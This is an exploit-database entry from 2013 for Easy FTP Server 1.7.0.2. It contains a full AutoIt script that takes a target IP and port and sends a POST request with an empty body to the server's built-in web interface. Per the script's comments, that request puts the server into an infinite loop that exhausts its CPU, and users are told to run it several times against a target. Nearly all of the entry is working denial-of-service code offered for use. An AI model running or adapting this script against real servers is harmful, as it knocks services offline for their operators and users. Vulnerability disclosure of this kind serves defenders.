Easy FTP Server 1.7.0.2 Denial Of Service



EKU-ID: 3141 CVE: OSVDB-ID:
Author: Akastep Published: 2013-04-08 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_Outfile=smdcpu.exe
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#include "WinHttp.au3"
#include <String.au3>

#cs

easyftpsvr-1.7.0.2 CPU consumption exploit.
The vulnerability is due easyftpsvr-1.7.0.2 's web interface (Easy-Web Server/1.0) contains flaw when accepting $_POST requests with EMPTY body.
In this case application runs into infinitve loop and consumes very high CPU usage.
Running following exploit 2-3 times against target machine that runs  easyftpsvr-1.7.0.2  (against it native web interface called Easy-Web Server/1.0)
consumes high CPU usage.

----------------  Be Carefull! -----------------

*DO not run it against your real machine.(Instead of use Virtualbox)*
Otherwise hard reboot is your best friend.

Demo vid:  http://youtu.be/fq1ebZGkoJM

------------------------------------------------
/AkaStep

#ce

Opt("MustDeclareVars", 1)





Global $INVALIDIP='INVALID IP FORMAT';
Global $INVALIDPORT='INVALID PORT NUMBER!';




Global $f=_StringRepeat('#',10);

Global $msg_usage=$f & '  easyftpsvr-1.7.0.2 CPU consumption exploit ' & StringMid($f,1,7) & @CRLF & _
$f & " Usage:  " & _
@ScriptName &  ' REMOTEIP ' &  ' REMOTEPORT  ' & $f & @CRLF & _
StringReplace($f,'#','\') & _StringRepeat(' ',10)  & _
'HACKING IS LIFESTYLE!' & _StringRepeat(' ',10) &  StringReplace($f,'#','/')



if $CmdLine[0]=0 Then
MsgBox(64,"easyftpsvr-1.7.0.2 CPU consumption exploit","This is a console Application!" & @CRLF & 'More Info: '  & @ScriptName & ' --help' & @CRLF & _
'Invoke It from MSDOS!',5)
exit;
EndIf
if  $CmdLine[0] <> 2 Then
  ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);
  exit;
EndIf

ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);

Global $ipaddr=StringMid($CmdLine[1],1,15);//255.255.255.255
Global $port=StringMid($CmdLine[2],1,5);//65535






Global $useragent='Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0';
Global $reqmethod='POST';
global $root_dir='/';
Global $thisconsumes='';//<=This is a reason of High CPU consumption. Empty $_POST body causes application to run into infinitve loop//




Global $hOpen = _WinHttpOpen($useragent);
Global $hConnect = _WinHttpConnect($hOpen, $ipaddr,$port)
Global $hRequest = _WinHttpOpenRequest($hConnect,$reqmethod,$root_dir,Default,Default,'');
_WinHttpAddRequestHeaders($hRequest, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" & @CRLF)
_WinHttpAddRequestHeaders($hRequest, "Accept-Language: en-US,en;q=0.5"& @CRLF)
_WinHttpAddRequestHeaders($hRequest, "Accept-Encoding: gzip, deflate"& @CRLF)
_WinHttpAddRequestHeaders($hRequest, "DNT: 1"& @CRLF)
_WinHttpAddRequestHeaders($hRequest, "Connection: close"& @CRLF)

_WinHttpSendRequest($hRequest, -1, $thisconsumes);// send empty $_POST body.//

Global $sHeader, $sReturned


If _WinHttpQueryDataAvailable($hRequest) Then

$sHeader = _WinHttpQueryHeaders($hRequest)
$sReturned &= _WinHttpReadData($hRequest)
_WinHttpCloseHandle($hRequest)
_WinHttpCloseHandle($hConnect)
_WinHttpCloseHandle($hOpen)
EndIf

ConsoleWrite(_StringRepeat('#',62) & @CRLF & _StringRepeat(' ',10)  &' PACKET WAS SENT! ' &  _StringRepeat(' ',10) & @CRLF & _StringRepeat('#',62));
ConsoleWrite(@CRLF & $f &  ' Run this exploit 2-3 times against target it will consume CPU deadly. ' & $f & @CRLF);
Exit;